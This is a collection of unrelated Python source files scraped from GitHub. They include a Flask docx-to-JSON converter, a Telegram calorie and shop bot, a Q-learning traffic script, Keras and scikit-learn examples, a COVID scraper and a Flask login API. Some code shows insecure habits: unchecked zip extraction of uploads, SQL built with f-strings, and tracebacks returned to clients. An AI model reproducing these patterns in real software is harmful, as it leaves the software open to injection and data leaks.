    """Return a presigned GET URL for *key* in the app bucket (valid 9600s)."""
    return s3_boto.generate_presigned_url(
        ClientMethod='get_object',
        Params={
            'Bucket': os.environ.get("AWS_BUCKET_NAME"),
            'Key': key,
        },
        ExpiresIn=9600,
    )
@app.route("/upload-document",methods=["POST"])
def uploadDocument():
document = request.files.get("file",False)
if(document):
memfile = BytesIO()
document.save(memfile)
document = Document(memfile)
tables = document.tables
z = zipfile.ZipFile(memfile)
z.extractall()
all_files = z.namelist()
# print(all_files)
images = filter(lambda x: x.startswith('/word/media/'), all_files)
# return "yo"
rels = {}
real_name = {}
for r in document.part.rels.values():
if isinstance(r._target, docx.parts.image.ImagePart):
file_location = '/word/media/'+secure_filename(generate_unique_name())
fbinary = open(f'word/media/{os.path.basename(r._target.partname)}',"rb")
file_url_upload = os.path.join("/media/docimages",os.path.basename(file_location))
s=buck.put_object(Body=fbinary.read(),Key=file_url_upload)
rels[r.rId] = get_url(file_url_upload)
# print(s.generate_presigned_url(expires_in=0))
real_name[r.rId] = os.path.basename(r._target.partname)
# Data will be a list of rows represented as dictionaries
# containing each row's data.
data = []
keys = None
topic_id = ''
get_string = ""
#print(dir(table.columns))
for table in tables :
tr = {}
for i, row in enumerate(table.rows):
tr[row.cells[0].text] = ''
for paragraph in row.cells[1].paragraphs:
if(row.cells[0].text == 'Topic ID'):
topic_id = row.cells[1].text
for rId in rels:
if rId in paragraph._p.xml:
z.extract('word/media/'+real_name[rId],os.getcwd())
tr[row.cells[0].text]+=f'<img src="{rels[rId]}">'
if(row.cells[0].text == 'Problem Statement' or row.cells[0].text == 'Correct Answer Explanation') :
# print(paragraph.font.superscripipt)
print(paragraph._element.xml)
get_string+=paragraph._element.xml+"\n"
tr[row.cells[0].text]+='<p>'+paragraph.text+'</p>'
# print(paragraph.style.font.superscript)
else :
tr[row.cells[0].text]+=paragraph.text
data.append(tr)
allData = {}
allData['document'] = {}
allData['document']['Topic ID'] = topic_id
allData['document']['questions'] = data
with open("output.xml",'w') as file:
file.write(get_string)
return jsonify(allData)
def arrangeData(data,variable,image_hash_data):
    """Store one (label, value) table cell pair into *variable*, rewriting any
    <img> src to the mirrored S3 object URL.

    *data* is a 2-element list of bs4 cells; *image_hash_data* maps original
    image basenames to their uploaded unique names.
    NOTE(review): the format string "{1}/{2}" never uses argument 0 (the
    bucket location), so the region lookup result is discarded -- confirm
    whether the URL is intended to omit it.
    """
    if(data[1].findChild()):
        if(len(data[1].findAll("img"))):
            img_data = data[1].findAll("img")
            for i,img in enumerate(img_data):
                if(image_hash_data.get(os.path.basename(img["src"]))):
                    object_url = "https://app.xxxx.com/{1}/{2}".format(
                        s3_boto.get_bucket_location(Bucket='xxxx-media')['LocationConstraint'],
                        'media/docimages',image_hash_data.get(os.path.basename(img["src"])))
                    img_data[i]["src"] = object_url
            # Keep inner HTML (with rewritten images), stripping the td wrapper.
            variable[data[0].text] = str(data[1]).replace("<td>", "").replace("</td>", "")
        else:
            variable[data[0].text] = data[1].text
        # print(type(data[1]))
        # print(data[1])
    else:
        variable[data[0].text] = data[1].text
    return variable
def preprocessData(data,image_hash_data):
    """Convert one bs4 <table> into a {label: value} dict via arrangeData.

    Rows whose first CSS class is "header" are skipped; rows without <td>
    cells fall back to <th> cells.
    NOTE(review): `tr["class"]` raises KeyError for rows with no class
    attribute -- confirm the pandoc output always sets one.
    """
    tr_data = data.findAll("tr")
    result_recv = {}
    for i,tr in enumerate(tr_data):
        result = tr_data[i]["class"]
        if(result[0]!="header"):
            all_data = tr_data[i].findAll("td")
            # print(all_data[0],all_data[1])
            if(len(all_data)):
                arrangeData(all_data, result_recv,image_hash_data)
            else:
                all_data = tr.findAll("th")
                arrangeData(all_data, result_recv,image_hash_data)
    return result_recv
@app.route("/api/json",methods=["POST"])
def preprocessDocFunc():
document = request.files.get("file",False)
image_hash_data = {}
errros_arr = []
all_data = []
topic_id = ""
if(document):
try:
document.save("static/predoc.docx")
# document = Document(memfile)
# tables = document.tables
real_file_path = "static/predoc.docx"
real_file_stream = open(real_file_path,"rb")
z = zipfile.ZipFile(real_file_stream)
z.extractall()
all_files = z.namelist()
# images_data = filter(lambda x:x.startwith("word/media"), all_files)
for i in all_files:
if(i.startswith("word/media")):
#unique_name = secure_filename(generate_unique_name())
unique_name = secure_filename(str(time.time())+uuid.uuid4().hex)
fbinary = open(os.path.join(os.getcwd(),f'word/media/{os.path.basename(i)}'),"rb")
file_url_upload = os.path.join("media/docimages",unique_name)
s=buck.put_object(Body=fbinary.read(),Key=file_url_upload)
image_hash_data[os.path.basename(i)] = unique_name
html = pypandoc.convert_file(real_file_path, 'html',extra_args=['--webtex'])
parser = BeautifulSoup(html,"html.parser").findAll("table")
topic_id = (parser[0].find(text="Topic ID").findNext("th") if parser[0].find(text="Topic ID").findNext("th") else parser[0].find(text="Topic ID").findNext("td")).text
all_data = [preprocessData(tdata,image_hash_data) for tdata in parser if preprocessData(tdata,image_hash_data)]
except Exception as e:
errros_arr.append(str(e))
return {
"document":{
"Topic ID":topic_id,
"questions":all_data
},
"errors":errros_arr
}
@app.route("/api/html",methods=["POST"])
def htmlresponse():
document = request.files.get("file",False)
image_hash_data = {}
errros_arr = []
all_data = []
topic_id = ""
if(document):
try:
document.save("static/predoc.docx")
# document = Document(memfile)
# tables = document.tables
real_file_path = "static/predoc.docx"
real_file_stream = open(real_file_path,"rb")
z = zipfile.ZipFile(real_file_stream)
z.extractall()
all_files = z.namelist()
# images_data = filter(lambda x:x.startwith("word/media"), all_files)
for i in all_files:
if(i.startswith("word/media")):
unique_name = secure_filename(str(time.time())+uuid.uuid4().hex)
#print(unique_name)
#exit()
fbinary = open(os.path.join(os.getcwd(),f'word/media/{os.path.basename(i)}'),"rb")
file_url_upload = os.path.join("media/docimages",unique_name)
s=buck.put_object(Body=fbinary.read(),Key=file_url_upload)
image_hash_data[os.path.basename(i)] = unique_name
time.sleep(1)
html = pypandoc.convert(real_file_path,'html',extra_args=['--mathjax'])
parser = BeautifulSoup(html,"html.parser").findAll("img")
img_data = parser
resp = str(html)
for i,img in enumerate(img_data):
if(image_hash_data.get(os.path.basename(img["src"]))):
old_img = img_data[i]['src']
object_url = "https://app.xxxx.com/{1}/{2}".format(
s3_boto.get_bucket_location(Bucket='xxxx-media')['LocationConstraint'],
'media/docimages',image_hash_data.get(os.path.basename(img["src"])))
resp = resp.replace(old_img,object_url )
except Exception as e:
errros_arr.append(str(e))
return resp
if __name__ == '__main__':
    # Listen on all interfaces. The original had a second, trailing
    # `app.run()` that could only execute after this server stopped -- it
    # was dead code and has been removed.
    app.run(host='0.0.0.0', port=5000)
8604753979 | import telebot
from telebot import types
import config
import values
import sqlite3
# Bot instance authenticated with the token from config.py.
bot = telebot.TeleBot(config.TOKEN)
# Catalog database; check_same_thread=False because telebot handlers may run
# on a different thread than the one that opened the connection.
db = sqlite3.connect('DB/catalog.db', check_same_thread=False)
sql = db.cursor()
# For reading USER's HEIGHT
def height(message, word):
weight = message.text
msg = bot.send_message(message.chat.id, 'Введи свой рост (в сантиметрах):\n')
bot.register_next_step_handler(msg, calc, (weight, word))
# For reading AGE or printing INDEX of body mass
def calc(message, lis):
h = int(message.text) / 100
w = int(lis[0])
if lis[1] == 'Калории':
msg = bot.send_message(message.chat.id, f'Введи свой возраст:\n')
bot.register_next_step_handler(msg, age, (h * 100, w))
elif lis[1] == 'Индекс':
bot.send_photo(message.chat.id, photo=open('vals.png', 'rb'),
caption=f'Ваш индекс массы тела:\n{round(w / (h ** 2), 2)}',
parse_mode='html')
# For printing necessary number of calories and reading about type of activity
def age(message, data):
w = data[1] * 9.99
h = data[0] * 6.25
a = int(message.text) * 4.92
pre_result = round(w + h - a)
bot.send_message(message.chat.id, f'<em><b>{pre_result}</b></em> — '
f'Столько калорий необходимо вам для того, '
f'чтобы просто существовать.',
parse_mode='html')
msg = bot.send_message(message.chat.id, values.description, parse_mode='html')
bot.register_next_step_handler(msg, activity, pre_result)
# printing necessary number of calories
def activity(message, res):
result = round(res * values.values[message.text])
bot.send_message(message.chat.id, f'Для похудения необходимо <b>{result - 400} -- {result - 200}</b> калорий\n'
f'Необходимо потреблять <b>{result}</b>'
f' калорий в день чтобы нормально восстанавливаться\n'
f'Для набора массы необходимо <b>{result + 200} -- {result + 400}</b> калорий\n',
parse_mode='html')
# Read data from DB (item shop) using user_id
def read_from_items_db(user_id):
data = [el for el in sql.execute(f"SELECT * FROM items WHERE rowid = {values.user_list[str(user_id)][0]}")]
# print(data)
return data
# Creating keyboard for card (below)
def create_markup_for_card():
keyboard = types.InlineKeyboardMarkup()
key_1 = types.InlineKeyboardButton(text='⬅ Предыдущий товар', callback_data='previous')
key_2 = types.InlineKeyboardButton(text='Следующий товар ➡', callback_data='next')
key_3 = types.InlineKeyboardButton(text='🗑 Добавить в корзину', callback_data='add_in_basket')
keyboard.row(key_1, key_2)
keyboard.add(key_3)
return keyboard
# Send message with data about item (card of item)
def send_item(message):
data = read_from_items_db(message.from_user.id)[0]
markup = create_markup_for_card()
if data[4] - data[3] != 0:
cost = f'{round(data[3])} - {round(data[4])}'
else:
cost = round(data[3])
try:
msg_id = message.chat.id
except:
msg_id = message.message.chat.id
bot.send_photo(msg_id,
open(data[5], 'rb'),
caption=f'\n<b>{data[2]}</b>\n\n'
f'Цена: <b>{cost} RUB</b>\n\n'
f'<em>Описание: {data[6].capitalize()}</em>\n'
f'\nВес: {round(data[-1] * 1000)} g.',
parse_mode='html',
reply_markup=markup)
# Is User in values.user_list
def test_of_being_in_list(msg_data):
if not (str(msg_data.from_user.id) in values.user_list):
values.iter_var_changer(msg_data.from_user.id, 1, True)
# How many notes in DB
def count_of_strings():
sql.execute("SELECT rowid FROM items")
return len(sql.fetchall())
# Getting data from DB about item in USER's basket
def get_data_from_basket(message):
user_basket = values.user_list[str(message.from_user.id)][1]
message_text = '\n'
for el, count in user_basket.items():
data = sql.execute(f"SELECT name FROM items WHERE rowid = {int(el)}").fetchone()[0]
message_text += f'\n• {data} = <b>{count} шт.</b>\n'
return message_text
def create_markup_for_basket(message):
    """Inline keyboard for the basket view: clear-basket and place-order.

    *message* may be a Message or a CallbackQuery (which wraps one).
    """
    # Narrowed from a bare `except:` so unrelated errors surface.
    try:
        msg_id = message.id
    except AttributeError:
        msg_id = message.message.id
    keyboard = types.InlineKeyboardMarkup()
    key_1 = types.InlineKeyboardButton(text='❌ Очистить корзину ❌', callback_data=f'clear_basket_{msg_id}')
    key_2 = types.InlineKeyboardButton(text='📋 Оформить заказ ', callback_data='create_order')
    keyboard.row(key_1)
    keyboard.row(key_2)
    return keyboard
def response_for_check_basket(message):
    """Show the basket contents, or an 'empty' notice with a dismiss button."""
    # `message` may be a Message or a CallbackQuery wrapping one; narrowed
    # from a bare `except:` so unrelated errors surface.
    try:
        msg_id = message.id
        chat_id = message.chat.id
    except AttributeError:
        msg_id = message.message.id
        chat_id = message.message.chat.id
    text = get_data_from_basket(message)
    if text == '\n':
        # Empty basket: single OK button that later deletes both messages.
        keyboard = types.InlineKeyboardMarkup()
        keyboard.add(types.InlineKeyboardButton(text='OK', callback_data=f'ok_{msg_id}'))
        text = 'Корзина пуста!'
    else:
        keyboard = create_markup_for_basket(message)
    bot.send_message(chat_id=chat_id,
                     text=f'{text}',
                     parse_mode='html',
                     reply_markup=keyboard)
"""
###########################################################
------ Starting of actions with different 'handlers' ------
###########################################################
"""
@bot.message_handler(commands=['calc'])
def characteristics(message):
    """Offer the two calculator modes via a reply keyboard."""
    keyboard = types.ReplyKeyboardMarkup(resize_keyboard=True)
    keyboard.row('Индекс', 'Калории')
    bot.send_message(message.chat.id, 'Что вы хотите узнать?', reply_markup=keyboard)
@bot.message_handler(commands=['hello', 'hi', 'sup'])
def greeting(message):
    """Send a greeting photo plus an inline hi/bye keyboard."""
    photo_msg = bot.send_photo(message.chat.id, open('photos/Rock.jpg', 'rb'))
    keyboard = types.InlineKeyboardMarkup()
    # The photo message id is embedded so callback() can delete it later.
    keyboard.row(
        types.InlineKeyboardButton(text='Привет', callback_data=f'hi_{photo_msg.id}'),
        types.InlineKeyboardButton(text='Пока', callback_data=f'bye_{photo_msg.id}'),
    )
    bot.send_message(message.chat.id,
                     f'Перед тобой бот для подсчета калорий <b>{bot.get_me().first_name}</b>',
                     parse_mode='html',
                     reply_markup=keyboard)
@bot.message_handler(commands=['market', 'shop', 'store'])
def market(message):
    """Open the shop menu and make sure the user has a state entry."""
    menu = types.ReplyKeyboardMarkup(resize_keyboard=True)
    menu.row('Каталог', 'Корзина')
    bot.send_message(message.chat.id, 'Добро пожаловать в магазин!\nИспользуйте меню для навигации: ',
                     reply_markup=menu)
    test_of_being_in_list(message)
@bot.message_handler(content_types=['text'])
def handler(message):
    """Dispatch free-text menu choices to the matching flow."""
    choice = message.text
    if choice in ('Индекс', 'Калории'):
        prompt = bot.send_message(message.chat.id, 'Введи свой вес:\n')
        bot.register_next_step_handler(prompt, height, choice)
    elif choice == 'Каталог':
        test_of_being_in_list(message)
        send_item(message)
    elif choice == 'Корзина':
        response_for_check_basket(message)
@bot.callback_query_handler(func=lambda call: True)
def callback(call):
    """Central dispatcher for all inline-button presses.

    Routes on call.data: greeting ack, catalog prev/next with wrap-around,
    add-to-basket, dismiss ('ok_*'), and clear-basket.
    """
    test_of_being_in_list(call)
    data = call.data.split('_')
    if data[0] == 'hi' or data[0] == 'bye':
        bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.id,
                              text=f'{values.for_greet[data[0]]} {call.from_user.first_name}!')
        # data[1] carries the id of the photo message to delete.
        bot.delete_message(call.message.chat.id, data[1])
    if call.data == 'next':
        # Advance the catalog position, wrapping past the last row to 1.
        index = values.user_list[str(call.from_user.id)]
        if index[0] < count_of_strings():
            values.iter_var_changer(call.from_user.id, index[0] + 1)
        else:
            values.iter_var_changer(call.from_user.id, 1)
        send_item(call)
    elif call.data == 'previous':
        # Step back, wrapping before row 1 to the last row.
        index = values.user_list[str(call.from_user.id)]
        if index[0] > 1:
            values.iter_var_changer(call.from_user.id, index[0] - 1)
        else:
            values.iter_var_changer(call.from_user.id, count_of_strings())
        send_item(call)
    elif call.data == 'add_in_basket':
        index = values.user_list[str(call.from_user.id)]
        # Increment the quantity if the item is already present, else add it.
        try:
            count = values.user_list[str(call.from_user.id)][1][str(index[0])]
            values.add_item(call.from_user.id, index[0], count + 1)
        except Exception as ex:
            # print(f'Firstly!{"#" * 10}Exception: {ex}')
            values.add_item(call.from_user.id, index[0], 1)
        bot.answer_callback_query(callback_query_id=call.id, text='\nТовар добавлен в корзину!\n')
        # for user, data in values.user_list.items():
        #     print(f'   |||{user} --- {data}|||')
    elif data[0] == 'ok':
        # bot.edit_message_text(chat_id=call.message.chat.id, text='Продолжайте покупки!', message_id=call.message.id)
        try:
            bot.delete_message(chat_id=call.message.chat.id, message_id=call.message.id)
            bot.delete_message(chat_id=call.message.chat.id, message_id=data[1])
        except Exception as ex:
            print(ex)
    elif data[0] + '_' + data[1] == 'clear_basket':
        values.clear_basket(call.from_user.id)
        try:
            # data[2] holds the id of the basket message to delete.
            bot.delete_message(call.message.chat.id, data[2])
            bot.delete_message(call.message.chat.id, call.message.id)
        except Exception as ex:
            print(ex)
    # Acknowledge the callback so the client stops showing a spinner.
    bot.answer_callback_query(call.id)
bot.polling(none_stop=True)
| Abrahamlink/body-bot | bot.py | bot.py | py | 10,450 | python | en | code | 0 | github-code | 36 |
2767696238 | from gym import Env
from gym.spaces import Discrete, Box
import numpy as np
import random
import numpy as np
from functions import Junction
env = Junction() # create the traffic-junction environment
action_size = env.action_space.n
print("Action size ", action_size)
state_size = env.observation_space.n
print("State size ", state_size)
# Q-table initialized to zeros: one row per state, one column per action.
qtable = np.zeros((state_size, action_size))
print(qtable)
total_episodes = 80000        # training episodes
total_test_episodes = 100     # evaluation episodes
max_steps = 100               # max steps per episode
learning_rate = 0.6           # Q-learning step size (alpha)
gamma = 0.6                   # discount factor
# Exploration parameters
epsilon = 1.0                 # current exploration probability
max_epsilon = 1.0             # exploration probability at start
min_epsilon = 0.01            # minimum exploration probability
decay_rate = 0.01             # exponential decay rate for exploration
# Metric logs filled during evaluation
data_bef=[]
data_aft=[]
time_step=[]
flow_state=[]
def flow(state):
    """Greenshields traffic flow: q = vf * (1 - k/kj) * k for density k."""
    jam_density = 1000     # kj, vehicles at standstill
    free_speed = 22.22     # vf, m/s
    return free_speed * (1 - state / jam_density) * state
def flow_data(k):
    """Record an already-computed flow value *k* in the flow_state history.

    Fixed: the original ignored its argument and appended flow(state) using
    the stale module-level `state`; call sites pass flow(new_state), so the
    old code both used the wrong density and applied flow() twice.
    """
    flow_state.append(k)
def append_data_bef(before_state):
    # Log a pre-action density (currently unused by the evaluation loop).
    data_bef.append(before_state)
def append_data_aft(after_state):
    # Log a post-action density observed from env.step.
    data_aft.append(after_state)
def append_time_slot(t):
    # Log the batch duration chosen for the current action.
    time_step.append(t)
def batch_time(current_action):
    """Map an action index (0-11) to its green-phase duration in seconds.

    Actions cycle through durations 15/30/45 for each of four signal phases;
    anything outside the known set yields 0.
    """
    if current_action in (0, 3, 6, 9):
        return 15
    if current_action in (1, 4, 7, 10):
        return 30
    if current_action in (2, 5, 8, 11):
        return 45
    return 0
# 2 For life or until learning is stopped
for episode in range(total_episodes):
# Reset the environment
state = env.reset()
step = 0
done = False
for step in range(max_steps):
# choosing an action a in the current world state s
## randomize a number
exp_exp_tradeoff = random.uniform(0,1)
## if this number > greater than epsilon then exploitation (taking the biggest Q value for this state)
if exp_exp_tradeoff > epsilon:
action = np.argmax(qtable[int(state),:])
# else random choice
else:
action = env.action_space.sample()
# Take the action a and observe the outcome state(s') and reward (r)
new_state, reward, done, info = env.step(action)
# Update Q(s,a):= Q(s,a) + lr [R(s,a) + gamma * max Q(s',a') - Q(s,a)]
qtable[int(state), action] = qtable[int(state), action] + learning_rate * (reward + gamma *
np.max(qtable[int(new_state), :]) - qtable[int(state), action])
# Our new state is state
state = new_state
# If done : finish episode
if done == True:
break
# reduce epsilon (because we need less and less exploration)
epsilon = min_epsilon + (max_epsilon - min_epsilon)*np.exp(-decay_rate*episode)
# Evaluation: run the greedy policy for total_test_episodes, logging metrics.
rewards = []
env.reset()
for episode in range(total_test_episodes):
    state = env.reset()
    step = 0
    done = False
    total_rewards = 0
    #print("****************************************************")
    #print("EPISODE ", episode)
    for step in range(max_steps):
        # UNCOMMENT IT IF YOU WANT TO SEE OUR AGENT PLAYING
        # env.render()
        # Greedy action: maximum expected future reward for this state.
        action = np.argmax(qtable[int(state),:])
        append_time_slot(batch_time(action))
        new_state, reward, done, info = env.step(action)
        append_data_aft(new_state)
        flow_data(flow(new_state))
        total_rewards += reward
        if done:
            rewards.append(total_rewards)
            print ("Score", total_rewards)
            break
        state = int(new_state)
env.close()
print ("Score over time: " + str(sum(rewards)/total_test_episodes))
#===========================================================================================================================
# Dump the collected metrics for manual inspection.
print(" ")
print(rewards)
print(" ")
print("--------------------------------------------------------------------------------------------------------------------")
print(time_step)
print(" ")
print("--------------------------------------------------------------------------------------------------------------------")
print(data_aft) # density after each greedy action
print(" ")
print("--------------------------------------------------------------------------------------------------------------------")
print(flow_state)
#dict = {
##    "den_aft" : data_aft
#}
#data = json.dumps(dict)
##with open("sample1.json", "w") as outfile:
#    outfile.write(data)
44396105133 | import numpy as np
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
import tensorflow_datasets as tfds
import os
if __name__ == '__main__':
    # End-to-end transfer-learning demo: frozen Xception backbone on the
    # cats_vs_dogs dataset, followed by a fine-tuning pass of the whole model.
    tfds.disable_progress_bar()
    # NOTE(review): tfds.Split.TRAIN.subsplit was removed in later tensorflow_datasets
    # releases (string splits like "train[:40%]" replaced it) -- this code pins an
    # old tfds API; confirm the installed version before upgrading.
    train_ds, validation_ds, test_ds = tfds.load(
        "cats_vs_dogs",
        data_dir=os.path.expanduser("~/junk/"),
        # Reserve 10% for validation and 10% for test
        split=[
            tfds.Split.TRAIN.subsplit(tfds.percent[:40]),
            tfds.Split.TRAIN.subsplit(tfds.percent[40:50]),
            tfds.Split.TRAIN.subsplit(tfds.percent[50:60])
        ],
        as_supervised=True,  # Include labels
    )
    print("Number of training samples: %d" % tf.data.experimental.cardinality(train_ds))
    print("Number of validation samples: %d" % tf.data.experimental.cardinality(validation_ds))
    print("Number of test samples: %d" % tf.data.experimental.cardinality(test_ds))
    # Resize every image to the fixed input resolution expected below.
    size = (150, 150)
    train_ds = train_ds.map(lambda x, y: (tf.image.resize(x, size), y))
    validation_ds = validation_ds.map(lambda x, y: (tf.image.resize(x, size), y))
    test_ds = test_ds.map(lambda x, y: (tf.image.resize(x, size), y))
    batch_size = 32
    train_ds = train_ds.cache().batch(batch_size).prefetch(buffer_size=10)
    validation_ds = validation_ds.cache().batch(batch_size).prefetch(buffer_size=10)
    test_ds = test_ds.cache().batch(batch_size).prefetch(buffer_size=10)
    # Light augmentation applied only through the data_augmentation layer below.
    data_augmentation = keras.Sequential(
        [
            layers.experimental.preprocessing.RandomFlip("horizontal"),
            layers.experimental.preprocessing.RandomRotation(0.1),
        ]
    )
    base_model = keras.applications.Xception(
        weights="imagenet",  # Load weights pre-trained on ImageNet.
        input_shape=(150, 150, 3),
        include_top=False,  # Do not include the ImageNet classifier at the top.
    )
    base_model.trainable = False  # Freeze the base_model
    # Create new model on top
    inputs = keras.Input(shape=(150, 150, 3))
    x = data_augmentation(inputs)
    # Pre-trained Xception weights requires that input be normalized from (0, 255) to a range (-1., +1.),
    # the normalization layer does the following, outputs = (inputs - mean) / sqrt(var)
    norm_layer = keras.layers.experimental.preprocessing.Normalization()
    mean = np.array([127.5] * 3)
    var = mean ** 2
    # The layer must be called once (built) before set_weights can be applied.
    x = norm_layer(x)  # Scale inputs to [-1, +1]
    norm_layer.set_weights([mean, var])
    # The base model contains batchnorm layers.
    # We want to keep them in inference mode when we unfreeze the base model for fine-tuning,
    # so we make sure that the base_model is running in inference mode here.
    x = base_model(x, training=False)
    x = keras.layers.GlobalAveragePooling2D()(x)
    x = keras.layers.Dropout(0.2)(x)  # Regularize with dropout
    outputs = keras.layers.Dense(1)(x)
    model = keras.Model(inputs, outputs)
    model.summary()
    model.compile(
        optimizer=keras.optimizers.Adam(),
        loss=keras.losses.BinaryCrossentropy(from_logits=True),
        metrics=[keras.metrics.BinaryAccuracy()],
    )
    """train the top layer"""
    epochs = 20
    model.fit(train_ds, epochs=epochs, validation_data=validation_ds)
    """do a round of fine-tuning of the entire model"""
    base_model.trainable = True
    model.summary()
    model.compile(
        optimizer=keras.optimizers.Adam(1e-5),  # Low learning rate for fine tuning
        loss=keras.losses.BinaryCrossentropy(from_logits=True),
        metrics=[keras.metrics.BinaryAccuracy()],
    )
    epochs = 10
    model.fit(train_ds, epochs=epochs, validation_data=validation_ds)
| jk983294/morph | book/tensorflow/models/transfer.py | transfer.py | py | 3,632 | python | en | code | 0 | github-code | 36 |
25617944185 | import numpy as np
from bs4 import BeautifulSoup
import pandas as pd
import requests
import time
import json
from tomlkit import array
URL = "https://covid19.riau.go.id/pantauan_data_kasus"
HEADERS = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36'
}
FILEDIR = "./"
FILENAME = "covid19-data-riau"
start_time = time.time()
# Fetch and parse the monitoring page.
r = requests.get(URL, headers=HEADERS).text
soup = BeautifulSoup(r, "html.parser")
section_title = soup.find("div", class_="section-title").text.strip()  # currently unused, kept for reference
# One anchor per regency/city; each href points to the corona.riau detail page.
city_list = soup.find_all("a", attrs={"href": lambda txt: "corona.riau" in txt.lower()})
all_cases = soup.find_all("td", class_="text-right")
labels = soup.find_all("th", class_="text-center")
labels = [label.text.strip() for label in labels]
# Flatten the case cells, then reshape to one row per city and one column per
# metric (the first 3 header cells are not data columns, hence labels[3:]).
cases = [case.text.strip() for case in all_cases]
cases = np.array(cases).reshape((len(city_list), len(labels[3:])))
# Build a nested dict: city -> detail URL + case counts grouped by category.
data = {}
for i, city in enumerate(city_list):
    city_url = city["href"]
    city = city.text.strip()
    data[city] = {
        "city url": city_url,
        "cases": {
            "spesimen": dict(zip(labels[3:7], cases[i][:4])),
            "suspek": dict(zip(labels[7:11], cases[i][4:8])),
            "terkonfirmasi": dict(zip(labels[11:], cases[i][8:])),
        }
    }
with open("{}.json".format(FILENAME), "w", encoding="utf-8") as f:
    json.dump(data, f, ensure_ascii=False, indent=4)
# Also export a tabular view with a two-level (category, metric) column index.
index = pd.Index([city.text.strip() for city in city_list])
columns = pd.MultiIndex.from_arrays(
    (['spesimen']*4 + ['suspek']*4 + ['terkonfirmasi']*4, labels[3:])
)
df = pd.DataFrame(cases, index=index, columns=columns)
print(df.head(20))
df.to_csv("{}.csv".format(FILENAME), index=True)
# Bug fix: the original format string was "%s.3f", which printed the elapsed
# time followed by a literal ".3f"; "%.3f" formats it to three decimals.
print("Finish in %.3f seconds." % (time.time()-start_time))
| mfalfafa/scrape-covid19-data-riau | scraper.py | scraper.py | py | 1,975 | python | en | code | 0 | github-code | 36 |
74431864103 | from fastapi import FastAPI
import requests
import uvicorn
app = FastAPI()
@app.get("/")
async def get_product():
    """Fetch one product record from the OpenFoodFacts API and return its JSON.

    Returns the upstream JSON payload on success; on a non-200 upstream
    response, returns an explicit error payload instead of silently
    returning None (which FastAPI would serialize as HTTP null).
    """
    req=requests.get("https://world.openfoodfacts.org/api/v0/product/3033491270864.json")
    if req.status_code==200:
        res=req.json()
        return(res)
    # Bug fix: the original fell through and returned None on upstream failure.
    return {"error": "upstream request failed", "status_code": req.status_code}
if __name__=='__main__':
uvicorn.run(app, host="127.0.0.1", port=8000) | apollineguerineau/TP5 | main.py | main.py | py | 352 | python | en | code | 0 | github-code | 36 |
74105436582 | import sqlite3
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_extraction.text import TfidfVectorizer
from datetime import datetime as dt
from sklearn.externals import joblib
start_time = dt.now()
# ---- load training data from the sqlite database ----
conn = sqlite3.connect("textarray.db")
cur = conn.cursor()
query = '''SELECT * from train'''
cur.execute(query)
y_train, names, descs, X_train = [], [], [], []
for c, n, d, w in cur.fetchall():
    y_train.append(c)
    names.append(n)
    descs.append(d)
    X_train.append(w)
vectorizer = joblib.load('vect.pkl')
# NOTE(review): fit_transform() re-fits the loaded vectorizer on this corpus;
# if the pickled vocabulary was meant to be reused as-is this should probably
# be transform() -- confirm against how vect.pkl was produced.
XtrV = vectorizer.fit_transform(X_train).toarray()  # X-Train-Vectorized
RF = RandomForestClassifier(n_estimators=100,
                            max_depth=9,
                            n_jobs=4)
RF.fit(XtrV, y_train)
joblib.dump(RF, 'RF.pkl', compress=9)
# ---- predict on the test set and write predictions back to the database ----
query = '''SELECT * from test'''
cur.execute(query)
y_test, names, descs, X_test = [], [], [], []
for c, n, d, w in cur.fetchall():
    y_test.append(c)
    names.append(n)
    descs.append(d)
    X_test.append(w)
test_size = len(y_test)
XteV = vectorizer.transform(X_test).toarray()  # X-Test-Vectorized
pred = RF.predict(XteV)
for i in range(test_size):
    cur.execute('''UPDATE test SET cat=? WHERE name=?''', (pred[i], names[i]))
# Bug fix: sqlite3 wraps DML in an implicit transaction; without an explicit
# commit every UPDATE above was silently rolled back when the process exited.
conn.commit()
conn.close()
print('Estimated: {0}'.format(dt.now()-start_time))
| kirilenkobm/ML_examples | RandomForestClf.py | RandomForestClf.py | py | 1,335 | python | en | code | 0 | github-code | 36 |
30838346418 | from flask import Blueprint, current_app, request, make_response, jsonify
from ..models.User import User
from flask_jwt_extended import (
create_access_token,
create_refresh_token,
jwt_required,
)
import traceback
auth_bp = Blueprint('auth_bp', __name__)
# register a new user
@auth_bp.route('/user/registration', methods=['POST'])
def deo_registration():
    """Create a new user account from a JSON or form payload.

    Returns 201 on success, 400 on validation failure, 500 on unexpected errors.
    """
    try:
        if request.is_json:
            data = request.get_json(force=True)
        else:
            data = request.form
        # Bug fix: 'password' and 'age' are read below but were missing from the
        # required-field list, so an incomplete payload raised KeyError (HTTP 500)
        # instead of returning a clean 400 validation error.
        columns = ["username","first_name","surname","HIV_status","Phone_number","password","age"]
        for column in columns:
            if column not in data:
                return make_response(jsonify({'message': f'{column} is missing from payload!'}), 400)
        existing_user = User.query.filter(User.username == data['username']).first()
        if existing_user:
            return make_response(jsonify({'message': 'Username already exists!'}), 400)
        if len(data['Phone_number']) > 15 or len(data['Phone_number']) < 10:
            return make_response(jsonify({'message': 'Phone number should be between 10-15 digits!'}), 400)
        # create new User (password is stored hashed, never in plain text)
        new_user = User(
            username = data['username'],
            first_name = data['first_name'],
            password = User.hash_password(data['password']),
            surname = data['surname'],
            age = data['age'],
            HIV_status = data['HIV_status'],
            Phone_number = data['Phone_number']
        )
        new_user.save()
        resp = jsonify({'message':'Account created successfully'})
        return make_response(resp, 201)
    except:
        # NOTE(review): returning the raw traceback leaks internals to clients;
        # consider logging server-side and returning a generic message instead.
        return make_response(str(traceback.format_exc()),500)
# user login
@auth_bp.route('/user/login', methods=['POST'])
def login():
    """Authenticate a user and return JWT access/refresh tokens.

    Returns 200 with tokens on success, 400 for unknown account or bad
    credentials, 500 on unexpected errors.
    """
    try:
        data = request.get_json(force=True)
        username = data['username']
        password = data['password']
        user = User.query.filter(User.username==username).first()
        if not user:
            return make_response(jsonify({"message":"Account doesn't exist"}),400)
        if not user.is_password_valid(password):
            return make_response(jsonify({"message":"Invalid credentials"}),400)
        # Bug fix: tokens were previously minted BEFORE the account/password
        # checks; only create them once the credentials have been verified.
        access_token = create_access_token(identity = username)
        refresh_token = create_refresh_token(identity = username)
        resp = jsonify({'access_token':access_token,
